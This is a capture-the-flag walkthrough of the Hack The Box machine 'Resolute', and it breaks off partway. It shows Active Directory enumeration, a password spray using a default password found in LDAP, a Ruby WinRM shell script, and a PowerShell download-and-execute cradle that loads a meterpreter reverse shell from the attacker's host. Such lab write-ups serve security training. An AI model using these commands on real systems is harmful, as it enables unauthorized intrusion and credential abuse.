10955
HTB - Windows Resolute
HTB - Windows Resolute
We started by findings a default password in the LDAP description fields of one user and then sprayed it on a list of user to get our initial foothold. A WinRM service allowed us to get our first shell through a ruby script. A Powershell log file containing the second user password could be found under an hidden directory at C:\. His account was member of DnsAdmin group which allows us to do a privilege escalation thanks to the DNS service.
nodody - user
Nmap as usual
$ nmap -sS -sV -sC -p- -T4 -vvv -oN nmap.txt 10.10.10.169
# Nmap 7.80 scan initiated Thu Jan 9 10:26:01 2020 as: nmap -sS -sV -sC -p- -T4 -vvv -oN nmap.txt 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up, received reset ttl 127 (0.018s latency).
Scanned at 2020-01-09 10:26:01 CET for 173s
Not shown: 65512 closed ports
Reason: 65512 resets
PORT STATE SERVICE REASON VERSION
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-09 09:35:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49912/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58466/tcp open unknown syn-ack ttl 127
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h48m47s, deviation: 4h37m10s, median: 8m45s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36199/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 13498/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-09T01:36:06-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-09T09:36:05
|_ start_date: 2020-01-09T00:05:31So this machine belong to an AD with some interesting services as smb (139/ 445) or AD ldap (389). The machine name is RESOLUTE, it domain name is megabank.local and the workgroup MEGABANK.
My first action is always smb enumeration in order to identify user or shares on the remote host, lets fire crackmapexec
$ cme smb 10.10.10.169 --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: SMB SessionError: 0x5b
$ cme smb 10.10.10.169 --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)It’s seems that we doesn’t have the rights for it :( let’s give a look for information on the ldap service. I’ve got a personnal tools to gather informations on ldap services however tons of public tools exist on the web.
./slap --host 10.10.10.169 --exec users -b "DC=megabank,DC=local"
[~] Testing connexion to ldap://10.10.10.169:389
[+] Logged as anonymous
[~] Gathering all users
[+] Found 30 users
CN=Guest,CN=Users,DC=megabank,DC=local
CN=DefaultAccount,CN=Users,DC=megabank,DC=local
CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
CN=MS02,CN=Computers,DC=megabank,DC=local
CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
CN=Sunita Rahman,CN=Users,DC=megabank,DC=local
CN=Abigail Jeffers,CN=Users,DC=megabank,DC=local
CN=Marcus Strong,CN=Users,DC=megabank,DC=local
CN=Sally May,CN=Users,DC=megabank,DC=local
CN=Fred Carr,CN=Users,DC=megabank,DC=local
CN=Angela Perkins,CN=Users,DC=megabank,DC=local
CN=Felicia Carter,CN=Users,DC=megabank,DC=local
CN=Gustavo Pallieros,CN=Users,DC=megabank,DC=local
CN=Ulf Berg,CN=Users,DC=megabank,DC=local
CN=Stevie Gerrard,CN=Users,DC=megabank,DC=local
CN=Claire Norman,CN=Users,DC=megabank,DC=local
CN=Paulo Alcobia,CN=Users,DC=megabank,DC=local
CN=Steve Rider,CN=Users,DC=megabank,DC=local
CN=Annette Nilsson,CN=Users,DC=megabank,DC=local
CN=Annika Larson,CN=Users,DC=megabank,DC=local
CN=Per Olsson,CN=Users,DC=megabank,DC=local
CN=Claude Segal,CN=Users,DC=megabank,DC=local
CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
CN=Zach Armstrong,CN=Users,DC=megabank,DC=local
CN=Simon Faraday,CN=Users,DC=megabank,DC=local
CN=Naoki Yamamoto,CN=Users,DC=megabank,DC=localThat a lot of users, maybe we can have more informations thanks to their description.
$ ./slap --host 10.10.10.169 --exec users -b "DC=megabank,DC=local" opt --full | grep description
description: Built-in account for guest access to the computer/domain
description: A user account managed by the system.
description: Account created. Password set to Welcome123!It’s seem that the default password is set to Welcome123! when an user is created. I guess it’s a good idea to test this password on all users now. Go create a wordlist and use msf to bruteforce it
$ ./slap.py --host 10.10.10.169 --exec users -b "DC=megabank,DC=local" opt --full | egrep "sAMAccountName: (.*)" | cut -d " " -f 6 > users_only.tx$ msf
use auxiliary/scanner/smb/smb_login
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users_only.txt
USER_FILE => users_only.txt
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass Welcome123!
SMBPass => Welcome123!
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Guest:Welcome123!',
[!] 10.10.10.169:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\DefaultAccount:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\RESOLUTE$:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\MS02$:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claude:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Marko:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) > Nice we have a hit for melanie:Welcome123!. I used my personnal tool but we could have used :
nullinux (manjaro users must install
manjaro-settings-samba)enum4linux
GetADUsers.py
$ sudo ./nullinux.py 10.10.10.169
Starting nullinux v5.4.1 | 01-10-2020 14:33
[*] Enumerating Shares for: 10.10.10.169
Shares Comments
-------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[*] Enumerating querydispinfo for: 10.10.10.169
abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach
[*] Enumerating enumdomusers for: 10.10.10.169
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[*] Enumerating LSA for: 10.10.10.169
[*] Performing RID Cycling for: 10.10.10.169
[*] Testing 10.10.10.169 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
Administrator
[+] Group: Domain Users
Administrator
DefaultAccount
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[+] Group: Domain Guests
Guest
[+] Group: Domain Computers
MS02$
[+] Group: Domain Controllers
RESOLUTE$
[+] Group: Schema Admins
Administrator
[+] Group: Enterprise Admins
Administrator
[+] Group: Group Policy Creator Owners
Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
ryan
[*] 29 unique user(s) identified
[+] Writing users to file: ./nullinux_users.txtNow that we have a valid user we want to have a shell to go further. I have the habit to look for data in shares
$ cme smb 10.10.10.169 -u melanie -p "Welcome123\!" --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares
SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark
SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------
SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.10.10.169 445 RESOLUTE C$ Default share
SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC
SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server shareWe see two available shares for us (READ permission) :
NETLOGON
SYSVOL
We can use smbmap.py to list recursively thoses directories
smbmap use impacket for network communication and since python3.8 there is a bug with this library. If you try to use it even with the rights credentials you will see
[!] Authentication error on(https://github.com/ShawnDEvans/smbmap/issues/40). So use python 3.6 instead for example.
$ ./smbmap.py -u melanie -p "Welcome123\!" -d MEGABANK -H 10.10.10.169 -R SYSVOL
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.169...
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
SYSVOL READ ONLY
.\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 megabank.local
.\megabank.local\
dr--r--r-- 0 Wed Sep 25 15:34:36 2019 .
dr--r--r-- 0 Wed Sep 25 15:34:36 2019 ..
dr--r--r-- 0 Fri Jan 10 01:23:59 2020 DfsrPrivate
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Policies
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 scripts
.\megabank.local\Policies\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 22 Wed Nov 20 20:06:43 2019 GPT.INI
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 MACHINE
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 USER
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 .
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Microsoft
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Scripts
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Windows NT
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 SecEdit
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 .
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 ..
fr--r--r-- 1098 Wed Nov 20 20:06:43 2019 GptTmpl.inf
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 .
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 ..
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Shutdown
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Startup
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 22 Wed Sep 25 15:28:35 2019 GPT.INI
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 MACHINE
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 USER
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Microsoft
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Windows NT
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 SecEdit
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 3740 Wed Sep 25 15:28:35 2019 GptTmpl.infNothing very interesant, let’s see NETLOGON
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.169...
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
NETLOGON READ ONLY
.\Uhm.
To be sure we can use crackmapexec spider command to find *.xml files like Groups.xml which contains high quality informations.
$ cme smb 10.10.10.169 -u melanie -p "Welcome123\!" --spider SYSVOL --pattern xml
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [*] Started spidering
SMB 10.10.10.169 445 RESOLUTE [*] Spidering .
SMB 10.10.10.169 445 RESOLUTE [*] Done spidering (Completed in 1.54662799835)Nothing more .. Let’s try something else, while googling some open port I fell on this one : 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP). This port is associated to WinRM (Windows Remote Management), it’s a microsoft service made to administrate remote host we could compare it like Shell - SSH on Linux to Powershell - WinRM on Windows. It’s based on HTTP protocol and SOAP. There are two assignated port : 5985 for http and 5986 for https. Usually we can use Powershell to use this service and execute command but as I am on Linux we have to find something else :
python : https://github.com/diyan/pywinrm (seems to have trouble with auth)
msf :
auxiliary/scanner/winrm/winrm_loginorauxiliary/scanner/winrm/winrm_cmd(andauxiliary/scanner/winrm/winrm_auth_methodsto identify authentication methods)
As the auxiliary/scanner/winrm/winrm_cmd was only getting me HTTP 500 I used a nice script found on https://www.absolomb.com/2018-07-15-HackTheBox-Bart/
require 'winrm'
opts = {
endpoint: 'http://10.10.10.169:5985/wsman',
user: 'melanie',
password: 'Welcome123!',
transport: :negotiate
}
conn = WinRM::Connection.new(opts)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end$ rlwrap ruby winrm_shell.rb
PS > whoami
megabank\melanieNow we have a tiny shell but it would be nice to have a meterpreter one so I’m gonna use the Invoke-MetasploitPayload (https://github.com/jaredhaight/Invoke-MetasploitPayload).
$ msf
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.37
SRVHOST => 10.10.14.37
msf5 exploit(multi/script/web_delivery) > set SRVPORT 8443
SRVPORT => 8443
msf5 exploit(multi/script/web_delivery) > set SSL true
SSL => true
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set URIPATH p
URIPATH => p
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.37
LHOST => 10.10.14.37
msf5 exploit(multi/script/web_delivery) > set LPORT 443
LPORT => 443
msf5 exploit(multi/script/web_delivery) > run -j
[*] Started HTTPS reverse handler on https://10.10.14.37:443
[*] Using URL: https://10.10.14.37:8443/p
[*] Server started.And in our tiny shell
PS > Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.37/Invoke-MetasploitPayload.ps1')
PS > Invoke-MetasploitPayload 'https://10.10.14.37:8443/p'Don’t forget to serve the
Invoke-MetasploitPayload.ps1from your local machine as HTB boxes can’t join internet.
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > sessions -L
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows MEGABANK\melanie @ RESOLUTE 10.10.14.37:443 -> 10.10.10.169:51140 (10.10.10.169)
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > sessions -i 1
meterpreter > shell
Process 2972 created.
Channel 2 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\melanie\Documents>type ..\Desktop\user.txt
type ..\Desktop\user.txt
0c3be45fcfe249796ccbee8d3a97854We have now a meterpreter shell with the user melanie.
whoami /all
USER INFORMATION
----------------
User Name SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enableduser - admin
Looking at C:\Users seems to show that there is another interesting user : ryan
PS > dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryaWhich information do we have about him from previous enumeration with my tool
$ cat users.txt | grep -i "CN=ryan" -A 40
CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Bertrand
sn: Bertrand
givenName: Ryan
distinguishedName: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
instanceType: 4
whenCreated: 20190927105650.0Z
whenChanged: 20200109105102.0Z
displayName: Ryan Bertrand
uSNCreated: 13048
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local
uSNChanged: 151424
name: Ryan Bertrand
objectGUID: [b'\xe3\x83\x8c\x84\xbel>M\xba\xcf\xaa{\xd3}\xa6\x91']
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours: [b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff']
pwdLastSet: 132230406621719534
primaryGroupID: 513
objectSid: [b'\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00i\xe0\x06SN\x15\x9a\xb3\xac\x08a\xd6Q\x04\x00\x00']
accountExpires: 0
logonCount: 0
sAMAccountName: ryan
sAMAccountType: 805306368
userPrincipalName: ryan@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105650.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132230019584087698
msDS-SupportedEncryptionTypes: 0He belongs to a group we do not have access to : Contractors, we can also use melanie shell on the server to get more information
PS > net user ryan /domain
User name ryan
Full Name Ryan Bertrand
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/11/2020 3:23:02 AM
Password expires Never
Password changeable 1/12/2020 3:23:02 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Contractors
The command completed successfully.We can also run post/windows/gather/enum_ad_groups or post/windows/gather/enum_ad_users
Or rpcclient
$ rpcclient -U melanie 10.10.10.169
Unable to initialize messaging context
Enter WORKGROUP\melanie's password
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]
rpcclient $> queryuser 0x451
User Name : ryan
Full Name : Ryan Bertrand
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : jeu., 01 janv. 1970 01:00:00 CET
Logoff Time : jeu., 01 janv. 1970 01:00:00 CET
Kickoff Time : jeu., 01 janv. 1970 01:00:00 CET
Password last set Time : sam., 11 janv. 2020 12:34:03 CET
Password can change Time : dim., 12 janv. 2020 12:34:03 CET
Password must change Time: jeu., 14 sept. 30828 04:48:05 CEST
unknown_2[0..31]...
user_rid : 0x451
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> Lets try to get into Ryan account . A terrible mistake I made was to not list hidden directories. I was using dir but it’s not showing ALL directories ..
If you wan to list all dir use dir -Force with powershell or dir /ah from cmd.
PS > cd c:\
PS > dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
PS > dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/10/2020 4:58 PM 402653184 pagefile.sys The PSTranscript is not one of those usually present at C:\, lets dig inside it.
PS > dir -Force -Recurse
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732
PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt This file seems interesting, it looks like log or debug file
